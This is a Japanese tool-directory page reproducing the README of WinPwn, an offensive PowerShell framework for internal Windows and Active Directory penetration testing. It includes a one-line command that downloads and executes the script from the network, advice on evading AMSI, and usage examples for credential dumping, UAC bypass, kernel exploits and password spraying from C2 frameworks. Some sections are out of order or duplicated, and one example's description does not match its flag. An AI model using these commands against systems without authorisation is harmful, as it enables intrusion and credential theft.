Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
WinPwn — 内部Windowsペネトレーションテスト / ADセキュリティの自動化 | Kitploit
ツール/GitHubGitHub/s3cur3th1ssh1t/winpwn
ペネトレーションテストフレームワーク特権昇格偵察エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミング
GitHubs3cur3th1ssh1t/winpwn

WinPwn

内部Windowsペネトレーションテスト / ADセキュリティの自動化

リポジトリを見る
3.7k53511ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

スポンサー

     

WinPwn

これまでの内部ペネトレーションテストにおいて、既存のPowerShell偵察・エクスプロイトスクリプトはプロキシ非対応であることが多く、問題を抱えていました。また、現在のシステムやドメインの情報を得るために、同じスクリプトを連続して実行することもよくありました。そこで、社内のペネトレーションテストプロセス(偵察およびエクスプロイト)の自動化とプロキシ対応のために、自動プロキシ認識と統合を行う独自スクリプトを作成しました。このスクリプトは、主に既知の大規模なオフェンシブセキュリティPowerShellプロジェクトを基にしています。

提案、フィードバック、プルリクエスト、コメントは大歓迎です!

以下のようにモジュールをインポートしてください:

Import-Module .\WinPwn.ps1 または iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

AMSIをバイパスするには、既存のバイパス手法のいずれかを使用し、AMSIトリガーを見つけて、バイパス関数内で手動で変更するか、トリガー文字列をエンコードしてください。または、スクリプト全体を難読化することもできます。

インターネットにアクセスできないWindowsシステムで行き詰まった場合でも問題ありません。Offline_Winpwn.ps1を使用するだけで、最も重要なスクリプトと実行ファイルが含まれています。

インポート後に使用可能な関数:

  • WinPwn -> 攻撃を選択するメニュー:

alt text

  • Inveigh -> 新しいコンソールウィンドウでInveighを実行、セッション管理機能(Invoke-TheHash)を統合したSMBリレー攻撃

  • SessionGopher -> SessionGopherを実行し、パラメータの入力を求める

  • Kittielocal ->

    • 難読化されたInvoke-Mimikatzバージョン
    • メモリ内でのSafetykatz
    • rundll32テクニックを使用したlsassダンプ
    • 難読化されたLazagneのダウンロードと実行
    • ブラウザ資格情報のダンプ
    • カスタマイズされたMimikittenzバージョン
    • Wi-Fi資格情報の流出
    • SAMファイルNTLMハッシュのダンプ
    • SharpCloud
  • Localreconmodules ->

    • インストール済みソフトウェア、脆弱性のあるソフトウェア、共有、ネットワーク情報、グループ、権限などの収集
    • SMB署名、LLMNRポイズニング、MITM6、HTTP上のWSUSなどの典型的な脆弱性のチェック
    • 資格情報やその他の機密情報のPowerShellイベントログのチェック
    • ブラウザ資格情報と履歴の収集
    • レジストリおよびファイルシステム上のパスワードの検索
    • 機密ファイル(設定ファイル、RDPファイル、KeePassデータベース)の検出
    • ローカルシステム上の.NETバイナリの検索
    • オプション: Get-Computerdetails (Powersploit) および PSRecon
  • ->

パラメータなしの場合、ほとんどの関数は対話型シェルからのみ使用できます。そこで、パラメータ -noninteractive および -consoleoutput を追加して、Empire、Covenant、Cobalt Strikeなどの非同期C2フレームワークからもスクリプトを使用できるようにしました。さらに、ローカルリポジトリからWinPwnの全機能を使用するための -repo パラメータも追加されました。使用方法は以下の通りです:

使用方法:

-noninteractive -> 関数に対する質問を表示せず、事前定義されたまたはユーザー定義のパラメータで実行

-consoleoutput -> loot/reportフォルダは作成されません。すべての関数の出力がコンソールに返されるため、C2フレームワークのエージェントログで確認できます。

例:

WinPwn -noninteractive -consoleoutput -DomainRecon -> すべてのドメイン偵察スクリプトと関数を実行し、おそらく大量の出力を生成します。

WinPwn -noninteractive -consoleoutput -Localrecon -> ローカルシステムに関する可能な限り多くの情報を列挙します。

Generalrecon -noninteractive -> 基本的なローカル偵察関数を実行し、出力を対応するフォルダに保存します。

UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp -> 低権限セッションから高整合性プロセスでステージャーを実行します。

Kittielocal -noninteractive -consoleoutput -browsercredentials -> SharpWebを介してブラウザ資格情報をダンプし、出力をコンソールに返します。

Kittielocal -noninteractive -browsercredentials -> SAMファイルのNTLMハッシュをダンプし、出力をファイルに保存します。

WinPwn -PowerSharpPack -consoleoutput -noninteractive -> Seatbelt、PowerUp、WatsonなどのC#バイナリをメモリ内で実行します。

Dotnetsearch -consoleoutput -noninteractive -> C:\Program Files\ および C:\Program Files (x86)\ 内の.NETアセンブリを検索します。

WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo -> ローカルWebサーバーをオフラインリポジトリとして使用し、インターネットアクセスなしでWinPwnを使用します。

Get_WinPwn_Repo.sh:

使用方法: ./Get_WinPwn_Repo.sh {オプション}

例: ./Get_WinPwn_Repo.sh --install

オプション: --install リポジトリをダウンロードし、./WinPwn_Repo/ に配置します。 --remove リポジトリ ./WinPwn_Repo/ を削除します。 --reinstall リポジトリを削除し、新しいものを ./WinPwn_Repo/ にダウンロードします。 --start-server ポート8000でPython HTTPサーバーを起動します。 --help このヘルプを表示します。

TO-DO

  • ある程度の難読化
  • さらなる難読化
  • PACファイル経由のプロキシサポート
  • 独自のcredsリポジトリ (https://github.com/S3cur3Th1sSh1t/Creds) からスクリプトを取得し、元のリポジトリの変更に依存しないようにする
  • さらに多くの偵察/エクスプロイト関数
  • 関数の取り扱いを改善するためのメニューの追加
  • AMSIバイパス
  • ETWのブロック

クレジット

  • Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
  • Arvanaghi - SessionGopher
  • PowerShellMafia - Powersploit
  • Dionach - PassHunt
  • A-mIn3 - WINSpect
  • 411Hall - JAWS
  • sense-of-security - ADrecon
  • dafthack - DomainPasswordSpray
  • rasta-mouse - Sherlock, Amsi Bypass, PPID Spoof & BlockDLLs
  • AlessandroZ - LaZagne
  • samratashok - nishang

経時的なスターゲイザー

Stargazers over time

法的免責事項:

事前の相互同意なくターゲットを攻撃するためにWinPwnを使用することは違法です。該当するすべての地域、州、連邦法を遵守するのはエンドユーザーの責任です。開発者は一切の責任を負わず、このプログラムの誤用や損害について責任を負いません。教育目的でのみ使用してください。

ツールをダウンロード
Domainreconmodules
  • 手動レビューのためのさまざまなドメイン情報の収集
  • 説明フィールド内のADパスワードの検出
  • 潜在的に機密性の高いドメイン共有ファイルの検索
  • 制約のない委任システム/ユーザーの列挙
  • Bloodhoundレポートの生成
  • ドメインシステムのMS17-10スキャナー
  • ドメインシステムのBluekeepスキャナー
  • SQL Serverの検出と監査機能 - PowerUpSQL
  • ドメインコントローラーまたは全システムのMS-RPRNチェック
  • Grouper2によるグループポリシー監査
  • ADレポートがCSVファイル(Excelがインストールされている場合はXLS)で生成される(ADRecon)
  • プリンターの一般的な脆弱性のチェック
  • リソースベースの制約付き委任攻撃パスの検索
  • すべてのDCでzerologon (CVE-2020-1472) のチェック
  • その他多数。詳細はご確認ください。
  • Privescmodules

    • itm4nのInvoke-PrivescCheck
    • winPEAS
    • PowersploitのPowerUp AllChecks、Sherlock、GPPPasswords
    • DLLハイジャック、ファイル権限、レジストリ権限と弱いキー、Rotten/Juicy Potatoチェック
  • kernelexploits ->

    • MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86のみ!
    • MS16-032 - (2008/7/8/10/2012)!
    • MS16-135 - (WS2k16のみ)!
    • CVE-2018-8120 - 2018年5月、Windows 7 SP1/2008 SP2、2008 R2 SP1!
    • CVE-2019-0841 - 2019年4月!
    • CVE-2019-1069 - Polarbear Hardlink、資格情報が必要 - 2019年6月!
    • CVE-2019-1129/1130 - 競合状態、複数コアが必要 - 2019年7月!
    • CVE-2019-1215 - 2019年9月 - x64のみ!
    • CVE-2020-0638 - 2020年2月 - x64のみ!
    • CVE-2020-0796 - SMBGhost
    • CVE-2020-0787 - 2020年3月 - すべてのWindowsバージョン
    • CVE-2021-34527/CVE-2021-1675 - 2021年6月 - PrintNightmare
    • CVE-2021-40449 - CallbackHell - 2021年10月
    • Juicy-Potato Exploit
    • itm4nのPrintspoofer
  • UACBypass ->

    • UAC Magic、James ForshawのUACに関する3部構成の投稿に基づく
    • Oddvar MoeによるUACバイパスcmstpテクニック
    • James ForshawによるDiskCleanup UACバイパス
    • Ernesto FernandezとThomas VanhoutteによるDccwBypassUACテクニック
  • SYSTEMShell ->

    • CreateProcessを使用したシステムシェルのポップ
    • NamedPipe偽装を使用したシステムシェルのポップ
    • トークン操作を使用したシステムシェルのポップ
    • UsoClient DLLロードまたはCreateProcessを使用したシステムシェルのバインド
  • Shareenumeration -> Invoke-Filefinder および Invoke-Sharefinder (Powerview / Powersploit)

  • Domainshares -> Snaffler または Passhunt による全ドメインシステムの検索

  • Groupsearch -> Get-DomainGPOUserLocalGroupMapping - グループポリシーマッピングを介して管理者アクセスまたはRDPアクセスがあるシステムを検出 (Powerview / Powersploit)

  • Kerberoasting -> 新しいウィンドウでInvoke-Kerberoastを実行し、後でクラックするためにハッシュを保存

  • PowerSQL -> SQL Serverの検出、現在のユーザーでのアクセス確認、デフォルト資格情報の監査 + UNCPathインジェクション攻撃

  • Sharphound -> Bloodhound 3.0 レポート

  • Adidnsmenu -> Active Directory統合DNSノードの作成または削除

  • MS17-10 -> ドメイン内のアクティブなWindowsサーバーまたは全システムをMS17-10(Eternalblue)の脆弱性についてスキャン

  • Sharpcradle -> リモートWebサーバーからC#ファイルをRAMにロード

  • DomainPassSpray -> DomainPasswordSpray攻撃、すべてのドメインユーザーに対して1つのパスワード

  • Bluekeep -> ドメインシステムのBluekeepスキャナー

  • leechristensen - Random Repo, Spoolsample, other ps1 scripts
  • HarmJ0y - Many good Blogposts, Gists and Scripts, all Ghostpack binaries
  • NETSPI - PowerUpSQL
  • Cn33liz - p0wnedShell
  • rasta-mouse - AmsiScanBufferBypass
  • l0ss - Grouper2,Snaffler,Grouper3
  • dafthack - DomainPasswordSpray
  • enjoiz - PrivEsc
  • itm4n - Invoke-PrivescCheck & PrintSpoofer
  • James Forshaw - UACBypasses
  • Oddvar Moe - UACBypass
  • Carlos Polop - winPEAS
  • gentilkiwi - Mimikatz, Kekeo
  • hlldz - Invoke-Phantom
  • Matthew Graeber - many Ps1 Scripts which are nearly used everywhere
  • Steve Borosh - Misc-Powershell-Scripts, SharpPrinter, SharpSSDP
  • Sean Metcalf - SPN-Scan + many usefull articles @adsecurity.org
  • @l0ss and @Sh3r4 - Snaffler
  • FSecureLABS - GPO Tools
  • vletoux - PingCastle Scanners
  • NCCGroup + BC-Security - ZeroLogon Scanner
  • All people working on Bloodhound - SharpHound Collector
  • klezVirus - SharpLdapRelayScan
  • cube0x0 - LdapSignCheck + other toolings
  • @s4ntiago_p - NanoDump
  • @thefLinkk - Handlekatz
  • @Mayyhem - SharpSCCM
  • @cube0x0 - LdapSignCheck
  • @klezVirus - SharpLdapRelayScan
  • @HarmJ0y, @leechristensen, @CCob - Certify
  • @Yudasm - ShadowHound
  • Many more people in the Community - I'm sure, that I've forgotten many other invididuals who indirectly contributed into this Script